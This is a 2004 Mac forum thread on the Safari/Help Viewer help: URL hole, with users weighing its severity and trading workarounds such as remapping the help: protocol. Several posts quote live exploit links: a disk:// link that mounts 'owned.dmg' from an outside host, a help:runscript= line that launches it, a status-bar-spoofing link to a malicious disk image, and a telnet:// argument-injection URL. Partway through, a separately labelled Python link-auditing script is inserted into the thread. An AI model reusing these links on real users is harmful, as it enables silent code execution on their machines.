

Serious Security Flaw in Mac OS X/Safari/Help Viewer (Page 4)
kampl
Dedicated MacNNer
Join Date: Jul 2002
Location: Boston, MA
May 17, 2004, 08:44 PM
 
Another vulnerability that requires the end user to be an ass-clown in order to be effective? Surely you jest.....

Move along, nothing to see here.
     
CharlesS
Posting Junkie
Join Date: Dec 2000
May 17, 2004, 09:21 PM
 
Originally posted by kampl:
Another vulnerability that requires the end user to be an ass-clown in order to be effective? Surely you jest.....

Move along, nothing to see here.
Yeah, only ass-clowns surf the Internet. You know, since you can initiate a JavaScript on one page that does all this just from clicking on a link.

Ticking sound coming from a .pkg package? Don't let the .bom go off! Inspect it first with Pacifist. Macworld - five mice!
     
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 17, 2004, 09:56 PM
 
Originally posted by kampl:
Another vulnerability that requires the end user to be an ass-clown in order to be effective? Surely you jest.....

Move along, nothing to see here.
This is not the case at all. A malicious site can do all this, with any OSX browser, without you doing ANYTHING at all. You just have to load the page and it's got you. This is in no way similar to the other recent hoaxes or trojans that require the user to do something.
weird wabbit
     
StacyK
Fresh-Faced Recruit
Join Date: May 2004
May 18, 2004, 02:37 AM
 
I'm glad too.

If for some reason you don't want to use MoreInternet, this fix can also be accomplished using the preferences pane in IE 5.2, that is if you are not such an Apple zealot that you deleted that ages ago. Once you set it there the change is good for Safari too.

Originally posted by Diggory Laycock:

MoreInternet makes this relatively easy - I'm glad to help.
     
Mr Scruff
Mac Enthusiast
Join Date: Feb 2001
Location: London, UK
May 18, 2004, 05:42 AM
 
Here's another demo that doesn't involve mounting a .dmg

WARNING: Clicking the below link will cause a non malicious command to be run on your system.

http://bronosky.com/pub/AppleScript.htm

Not good...
     
Simon
Posting Junkie
Join Date: Nov 2000
Location: in front of my Mac
May 18, 2004, 05:57 AM
 
No offense to Mr Scruff here, but I strongly advise everybody to look at the HTML source of the files that are linked to in this discussion before they click the link and run real code.

To pros this is certainly obvious, but maybe the less experienced users would just like to see a demo of the exploit and could run into problems if some sucker posts a "demo" link that turns out to be really malicious.

Here's what to do: Download the linked file with a CLI tool like curl or wget (so that it doesn't get executed by any helper app) and then look at the file with a simple text editor like pico, emacs, less or more (so that you see the raw HTML code rather than the rendered HTML). If you don't know what all this means you would rather not click on any such link at all. Chances are somebody could take advantage of the situation and really screw you.
     
Simon
Posting Junkie
Join Date: Nov 2000
Location: in front of my Mac
May 18, 2004, 06:10 AM
 
I just reread my post and realized that it doesn't make sense.

The users that know the CLI tools involved probably know enough to not just click on any posted link.

The users who don't know the CLI tools can probably also not judge if the code is just a "good" demo or actually really malicious. I suggest these people should avoid clicking on these links altogether at least if they can't 100% trust the source. Apple.com should post a demo.

But, here's an easy to follow way to check the so-called demo links:
- In Safari right-click on the link and save the linked file to your disk ("Save Linked File As...")
- Open the downloaded file from within a text app that will display the raw text and not the rendered HTML. TextEdit does not work because it renders right away. AppleWorks does work. I don't know about Word since I don't use it.
- Look for a line containing "help:runscript="

If you do not understand what this line does or if you are not 100% sure the line only demonstrates inoffensive things you should never click on the link and run the script.
     
Love Calm Quiet
Mac Elite
Join Date: Mar 2001
Location: CO
May 18, 2004, 06:39 AM
 
I've been reading this thread for days, and no one seems to present an effective argument other than that this is a VERY serious security hole.

Isn't it extremely distressing that Apple hasn't taken any public action, made a statement, issued a warning?

Would someone more knowledgeable among you word what warning(s) seem at present to be most appropriate?

a) "Uncheck 'Open safe files...' " ?

b) "Even after (a), don't click on any hot links on sites you don't trust 100%" ?

[ I'd like to see if there is agreement as to what self-protective steps are needed as of 10.3.3. ]
TOMBSTONE: "He's trashed his last preferences"
     
Simon
Posting Junkie
Join Date: Nov 2000
Location: in front of my Mac
May 18, 2004, 06:49 AM
 
Originally posted by Love Calm Quiet:
what warning(s) seem at present to be most appropriate?
Here's my 1-2-3 suggestion:

Step 1) Download More Internet and use it to set Chess.app as the default helper app for the protocol "help" as noted earlier in this thread

Step 2) Send e-mail to Apple and tell them this needs to be fixed ASAP!

Step 3) Be careful. Do not trust everybody. Think before clicking.

P.S. Even if we assume Apple will fix their ridiculous mistake someday, step 3 will always remain valid.
     
JLL
Professional Poster
Join Date: Apr 1999
Location: Copenhagen, Denmark
May 18, 2004, 07:58 AM
 
Originally posted by Mr Scruff:
Here's another demo that doesn't involve mounting a .dmg

WARNING: Clicking the below link will cause a non malicious command to be run on your system.

http://bronosky.com/pub/AppleScript.htm

Not good...
Except you really can't do any harm that way. As you write yourself:

(This one doesn't work because spaces cannot be used in the command string)
JLL

- My opinions may have changed, but not the fact that I am right.
     
Mr Scruff
Mac Enthusiast
Join Date: Feb 2001
Location: London, UK
May 18, 2004, 09:22 AM
 
Originally posted by JLL:
Except you really can't do any harm that way. As you write yourself:

(This one doesn't work because spaces cannot be used in the command string)
The demo isn't mine, but looking at it again, you're right. The technique given still only allows you to run an arbitrary file (which in this case happens to be a CL tool) but not to specify arguments (since it does the equivalent of double clicking it in the Finder).

I don't think there are any commands that do any damage when run without any arguments.
     
mbryda
Senior User
Join Date: Mar 2002
May 18, 2004, 10:46 AM
 
Originally posted by Link:
The difference between apple and microsoft is Microsoft is a valued, and respected company by the masses.
That's hilarious. M$ not respected by the masses. Every new worm and virus that comes out erodes that perception. If anything, people are starting to look at other options next time it comes time to replace their hardware/software.

Each upgrade is a harder and harder sell for M$. Look at M$'s stock price - it's lower than Apple's. Not much value there.
     
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 18, 2004, 11:24 AM
 
Originally posted by JLL:
Except you really can't do any harm that way. As you write yourself:

(This one doesn't work because spaces cannot be used in the command string)
Has this been tried with "%20" URL encoding for spaces or with the "%22" encoding for quotes in case the command and arguments need to be quoted?
weird wabbit
     
[APi]TheMan
Mac Elite
Join Date: Sep 2001
Location: Chico, CA and Carlsbad, CA.
May 18, 2004, 11:57 AM
 
Originally posted by Mr Scruff:
The demo isn't mine, but looking at it again, you're right. The technique given still only allows you to run an arbitrary file (which in this case happens to be a CL tool) but not to specify arguments (since it does the equivalent of double clicking it in the Finder).

I don't think there are any commands that do any damage when run without any arguments.
... but it can point to a script on a disk image with a known path that the hacker had previously (and silently) mounted via the disk:// mechanism. This is scary when you begin to consider the idea mentioned on the above website where unsolicited software could be installed, such as a "Free AOL Trial."

Also, a simple JavaScript could hide the destination URL of a link in some browsers as such:
<a href="disk://server.somehacker.com/malicious.dmg" onMouseOver="window.status='http://www.apple.com/'; return true">Click here to go to Apple's homepage</a>
In my tests I couldn't get Safari to utilize my status bar code, but Camino and Firefox did. One plus is that Camino has an option in preferences to prevent sites from changing the status bar in the Web Features section. Just one more thing to be careful of I suppose. Welcome to the internet, boys and girls.

Also, I set my protocol helper for "help:" to TextEdit, Chess takes too long to open on my mediocre speed G4.
( Last edited by [APi]TheMan; May 18, 2004 at 12:39 PM. )
"In Nomine Patris, Et Fili, Et Spiritus Sancti"

     
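Simon's "save the linked file, then look for help:runscript=" check and the status-bar trick [APi]TheMan describes can both be automated in one pass over a saved page. The script below is an added example, not code from this thread or from More Internet or MisFox: it reads an HTML file saved to disk (never fetching anything itself), decodes %20/%22-style escapes first (so the encoding theolein asks about does not hide anything), and reports every anchor whose target uses the help: or disk: scheme, every help:runscript= payload, and every onMouseOver handler that overwrites window.status. SAMPLE_HTML, the PLACEHOLDER names and the host server.example.com are constructed for the demonstration.

```python
"""Audit a saved HTML page for the link tricks discussed in this thread.

Added example, not code from the thread or from More Internet/MisFox.
It automates the "save the linked file, then look for help:runscript="
check and also flags anchors whose onMouseOver rewrites window.status.
SAMPLE_HTML, the PLACEHOLDER names and server.example.com are constructed.
"""
import sys
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Schemes that an unpatched 10.3.3 hands to a helper application outside the
# browser: help: goes to Help Viewer, disk: mounts a disk image.
HELPER_SCHEMES = {"help", "disk"}


class LinkAuditor(HTMLParser):
    """Records (line, kind, detail) for every suspicious <a> tag."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":            # HTMLParser lower-cases tag and attribute names
            return
        attrs = {name: (value or "") for name, value in attrs}
        line = self.getpos()[0]   # 1-based line of the tag in the saved file
        href = attrs.get("href", "")
        # Decode %20/%22 escapes first so an encoded payload is still visible.
        decoded = unquote(href)
        scheme = urlsplit(decoded).scheme.lower()
        if scheme in HELPER_SCHEMES:
            if scheme == "help" and "runscript=" in decoded.lower():
                kind = "help:runscript"
            else:
                kind = f"{scheme}: helper-app link"
            self.findings.append((line, kind, decoded))
        # Status-bar spoofing: the handler overwrites what the browser shows
        # as the destination while the real href goes elsewhere.
        handler = attrs.get("onmouseover", "")
        if "window.status" in handler.replace(" ", ""):
            self.findings.append((line, "status-bar spoof", handler))


def audit_html(text):
    """Return the list of findings for one HTML document."""
    auditor = LinkAuditor()
    auditor.feed(text)
    auditor.close()
    return auditor.findings


def looks_clean(text):
    """True when no helper-app link or status-bar spoof was found."""
    return not audit_html(text)


# Constructed sample standing in for a "demo" page saved to disk.
SAMPLE_HTML = """<html><body>
<p>Constructed sample page for this example.</p>
<a href="http://www.apple.com/">Ordinary link</a>
<a href="help:runscript=PLACEHOLDER.scpt">Looks like a help link</a>
<a href="disk://server.example.com/PLACEHOLDER.dmg"
   onMouseOver="window.status='http://www.apple.com/'; return true">Apple's homepage</a>
</body></html>"""


if __name__ == "__main__":
    if len(sys.argv) > 1:         # e.g. a file saved with: curl -o saved.html <url>
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_HTML
    for line, kind, detail in audit_html(text):
        print(f"line {line}: {kind}: {detail}")
    print("no findings" if looks_clean(text) else "do not click this link")
```

Save the page with curl or Safari's "Save Linked File As..." and pass the file name as the first argument; with no argument the script audits its own constructed sample. A page that comes back clean is not proven safe (a script can build the URL at run time), so the finding list is a reason not to click, never a reason to click.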
Developer  (op)
Addicted to MacNN
Join Date: Apr 2001
Location: europe
May 18, 2004, 11:59 AM
 
What about this:

telnet://-n%2fApplications%2ftestfile

Found in the AppleInsider forums.

Is this a security threat? If so, is it related?
Nasrudin sat on a river bank when someone shouted to him from the opposite side: "Hey! how do I get across?" "You are across!" Nasrudin shouted back.
     
JLL
Professional Poster
Join Date: Apr 1999
Location: Copenhagen, Denmark
May 18, 2004, 12:38 PM
 
Originally posted by [APi]TheMan:
... but it can point to a script on a disk image with a known path that the hacker had previously (and silently) mounted via the disk:// mechanism.
Yep, but then the method isn't different from the others. The point about the "new" method was that you didn't need to mount an image.
JLL

- My opinions may have changed, but not the fact that I am right.
     
[APi]TheMan
Mac Elite
Join Date: Sep 2001
Location: Chico, CA and Carlsbad, CA.
May 18, 2004, 12:41 PM
 
Originally posted by JLL:
Yep, but then the method isn't different from the others. The point about the "new" method was that you didn't need to mount an image.
Ah-hah, so it is! Duly noted
"In Nomine Patris, Et Fili, Et Spiritus Sancti"

     
JLL
Professional Poster
Join Date: Apr 1999
Location: Copenhagen, Denmark
May 18, 2004, 12:42 PM
 
Originally posted by theolein:
Has this been tried with "%20" URL encoding for spaces or with the "%22" encoding for quotes in case the command and arguments need to be quoted?
Doesn't work.
JLL

- My opinions may have changed, but not the fact that I am right.
     
CharlesS
Posting Junkie
Join Date: Dec 2000
May 18, 2004, 12:42 PM
 
Originally posted by Developer:
What about this:

telnet://-n%2fApplications%2ftestfile

Found in the AppleInsider forums.

Is this a security threat? If so, is it related?
It's not related, but it could potentially be a problem. It would require a bit of work, though - compromising someone's machine with this would not be effortless like it is with the hole being discussed in this thread.

Ticking sound coming from a .pkg package? Don't let the .bom go off! Inspect it first with Pacifist. Macworld - five mice!
     
Love Calm Quiet
Mac Elite
Join Date: Mar 2001
Location: CO
May 18, 2004, 06:38 PM
 
Despite doing something dumb I (luckily) didn't wipe my home directory:

With MacNN reporting the eWeek story on the OS X vulnerability, I followed the links to Isophonic's "patch". Stupidly I clicked on the first link (thinking it would explain more, and not noticing it was a .dmg):

"Don't Go There, GURLfriend 1.0 18 May 2004
We've just released Don't Go There, GURLfriend! 1.0. DGTGF is an application you can use to patch away the OS X exploit found at http://bronosky.com/pub/AppleScript.htm quickly and effortlessly. Miroku Hotei, Ollie Wagner"

So... it mounts dmg, launches Help and Terminal, and completes the Terminal command.

I have no idea what "patch" was installed -- but it sure was a lesson in how readily my Safari browsing could turn over complete control to unknown scripting (even though I had unchecked "open safe files" upon download in the Safari prefs).

Comments on what other settings I could have changed to prevent the downloading, mounting, and execution of a .dmg?
TOMBSTONE: "He's trashed his last preferences"
     
Developer  (op)
Addicted to MacNN
Join Date: Apr 2001
Location: europe
May 18, 2004, 07:18 PM
 
Originally posted by Love Calm Quiet:
Comments on what other settings I could have changed to prevent the downloading, mounting, and execution of a .dmg?
What I suggest:

Download and run MisFox (a program to change Internet preferences of the OS by the author of iCab):

http://www.clauss-net.de/misfox/misfox.html

Click the Protocol Helpers tab and find the entry for the help: protocol. It will be set to Help Viewer. Change the entry to some other program like Chess. Should you encounter the exploit, Chess will simply run instead of Help Viewer and no scripts will be executed.

When Apple has a fix for the problem, before you install the update run MisFox again and set the help: protocol back to Help Viewer (it's in /System/Library/Core Services/).

I suggest you do not attempt to install any fixes that try to edit the OpnApp scripts or delete the MacHelp.help folder. They do not completely protect from this vulnerability and are not easy to reverse.
Nasrudin sat on a river bank when someone shouted to him from the opposite side: "Hey! how do I get across?" "You are across!" Nasrudin shouted back.
     
CharlesS
Posting Junkie
Join Date: Dec 2000
May 18, 2004, 08:24 PM
 
Meh, use More Internet instead of MisFox. It's developed by a member of these boards, and comes in a proper DMG file instead of a SIT.

Ticking sound coming from a .pkg package? Don't let the .bom go off! Inspect it first with Pacifist. Macworld - five mice!
     
catsdorule
Fresh-Faced Recruit
Join Date: Jan 2004
May 18, 2004, 08:27 PM
 
Um, what's with all the complicated fixes, jeez....

OLOLL!! i know! delet erry script on teh comuter!

sudo chmod 000 /System/Library/CoreServices/Help\ Viewer.app

Proper temp fix.
     
utidjian
Senior User
Join Date: Jan 2001
Location: Mahwah, NJ USA
May 18, 2004, 08:50 PM
 
Originally posted by CharlesS:
Meh, use More Internet instead of MisFox. It's developed by a member of these boards, and comes in a proper DMG file instead of a SIT.
Heh... well, if the link to the download is set up correctly, all one has to do is click on it and it will install itself! *rimshot*

-DU-...etc...
     
kampl
Dedicated MacNNer
Join Date: Jul 2002
Location: Boston, MA
May 18, 2004, 08:56 PM
 
Originally posted by CharlesS:
Yeah, only ass-clowns surf the Internet. You know, since you can initiate a JavaScript on one page that does all this just from clicking on a link.
Then I guess I'm in good company. In any event, I could see this being used for phishing style attacks and not much else. Similar to vulns for IE not that long ago. Perhaps if a trusted site were infiltrated this would be a problem. Being that it runs in the context of the user I'm not worrying about it, my system will not be taken out of action by this and anything important is backed up offline. *shrug* Don't really care, a timely fix would be nice though.
     
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 18, 2004, 11:04 PM
 
Originally posted by kampl:
Then I guess I'm in good company. In any event, I could see this being used for phishing style attacks and not much else. Similar to vulns for IE not that long ago. Perhaps if a trusted site were infiltrated this would be a problem. Being that it runs in the context of the user I'm not worrying about it, my system will not be taken out of action by this and anything important is backed up offline. *shrug* Don't really care, a timely fix would be nice though.
There are quite a lot of sites, mainly spammers' sites, sites of the type that used to download diallers onto your PC via IE, sites that downloaded spyware onto your PC via IE and porn sites that would love something as easy to implement as this. The site that wants to delete your data is rare, the site that wants to use you for their profit isn't.
weird wabbit
     
Groovy
Mac Enthusiast
Join Date: Apr 2001
May 18, 2004, 11:43 PM
 
Originally posted by catsdorule:
Um, what's with all the complicated fixes, jeez....

OLOLL!! i know! delet erry script on teh comuter!

sudo chmod 000 /System/Library/CoreServices/Help\ Viewer.app

Proper temp fix.
IMHO that is not the best way because you lose help in apps you do want it.

IMHO the best way is to DL "More Internet" system pref and have the help: protocol
point to chess etc... That stops url abuse but lets already on mac apps access help.

I have tested it and it works well AND with "More Internet" system pref you can
do OTHER cools things also like add hotline: protocol and have those links
launch that app and connect to a server. (just an example)
     
Spliffdaddy
Posting Junkie
Join Date: Oct 2001
Location: South of the Mason-Dixon line
May 19, 2004, 12:34 AM
 
Did anyone bother to check and see if the 'Chess' app has a security hole?
     
sniffer
Professional Poster
Join Date: Nov 2000
Location: Norway (I eat whales)
May 19, 2004, 02:58 AM
 
Originally posted by catsdorule:

sudo chmod 000 /System/Library/CoreServices/Help\ Viewer.app

Proper temp fix.
What happens if you run Repair Permissions with Disk Utility? What happens if you want to read help files?

Sniffer gone old-school sig
     
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 19, 2004, 04:10 AM
 
Originally posted by Spliffdaddy:
Did anyone bother to check and see if the 'Chess' app has a security hole?
That would be the riot of the day, if it turned out that Chess.app had a buffer overflow vulnerability: Queen to A6 -> joo R 0\/\/n3D N00b
weird wabbit
     
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 19, 2004, 05:39 AM
 
Actually, since it's been a number of days since this has become public knowledge (and Apple knows about this for sure) I wonder just how long the people at Cupertino are going to take to issue a security update on this one.
weird wabbit
     
bygimis
Junior Member
Join Date: Sep 2000
May 19, 2004, 05:43 AM
 
If you can embed these help URLs in HTML e-mail?

In Panther, HTML mail in Mail.app is rendered by WebCore, and so could suffer the same problem....

This would allow you to e-mail someone an HTML e-mail and embed code that could run arbitrary code... find a way of saving an attachment automatically using AppleScript, then execute it, hook into the Address Book API and send to all, and you have a classic MS-style virus.
Nobody made a greater mistake than
he who did nothing because he could only
do a little. Edmund Burke
     
mbotta
Fresh-Faced Recruit
Join Date: Jan 2003
Location: Amsterdam, NL
May 19, 2004, 08:22 AM
 
Question: suppose Apple comes with a fix and we can all sigh a collective breath of relief, how do you re-select Help as the help:// helper app?

Help? I mean, I don't see it as a selectable app in the Internet Explorer prefs.

Cheers,

mbotta
     
Developer  (op)
Addicted to MacNN
Join Date: Apr 2001
Location: europe
May 19, 2004, 09:33 AM
 
Originally posted by mbotta:
Question: suppose Apple comes with a fix and we can all sigh a collective breath of relief, how do you re-select Help as the help:// helper app?
http://forums.macnn.com/showthread.p...=3#post1993117
Nasrudin sat on a river bank when someone shouted to him from the opposite side: "Hey! how do I get across?" "You are across!" Nasrudin shouted back.
     
Groovy
Mac Enthusiast
Join Date: Apr 2001
May 19, 2004, 11:37 AM
 
have you all seen this?

"An example of a variation that doesn't require that a disk image be mounted or that a
malicious script be located on the user's computer is available here. The example at that
URL uses JavaScript to take advantage of a help URL. NOTE: Accessing that URL will open
Terminal and run a harmless example of the "du" (disk usage) command in order to
demonstrate how a help URL could be used to execute a Terminal command without the
user needing to download any files. Accessing the page is safe at the time of publication
of this story."

To see how it works, go to the link below. It will run a harmless "du" when you go there
to show you whether you are vulnerable. It shows all the details on how it was done
and how to plug the hole. I have since changed the "help:" protocol to point
to the Chess app, and that stops it and the other variations.


http://bronosky.com/pub/AppleScript.htm
     
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 19, 2004, 11:53 AM
 
Originally posted by Groovy:
have you all seen this?



.......


http://bronosky.com/pub/AppleScript.htm
RTFT
weird wabbit
     
eddiecatflap
Baninated
Join Date: Sep 2002
Location: http://www.rotharmy.com
May 19, 2004, 12:33 PM
 
..oh god , i'm starting to miss os-9 now

     
Simon
Posting Junkie
Join Date: Nov 2000
Location: in front of my Mac
May 19, 2004, 12:36 PM
 
Originally posted by eddiecatflap:
..oh god , i'm starting to miss os-9 now
I think we've been there before.

Let go, it's over.

     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
May 19, 2004, 12:55 PM
 
Originally posted by CharlesS:

These two links will execute the malware with 'safe' files turned off:

disk://fundisom.com/owned/owned.dmg
help:runscript=MacHelp.help/Contents/Resources/English.lproj/shrd/OpnApp.scpt%20string='Volumes:ww:owned.app'

GOD DAMN PIECE OF SHIT.
I AGREE.

This is the first time that an Apple bug / exploit scares me.
That is just too easy to implement and abuse !

Apple, fix this QUICK !

No HTML code should ever be able to execute a script !

-t
     
sniffer
Professional Poster
Join Date: Nov 2000
Location: Norway (I eat whales)
May 19, 2004, 01:14 PM
 
Originally posted by turtle777:

No HTML code should ever be able to execute a script !
At least no execution of "scripts" outside the browser ..

Sniffer gone old-school sig
     
All contents of these forums © 1995-2017 MacNN. All rights reserved.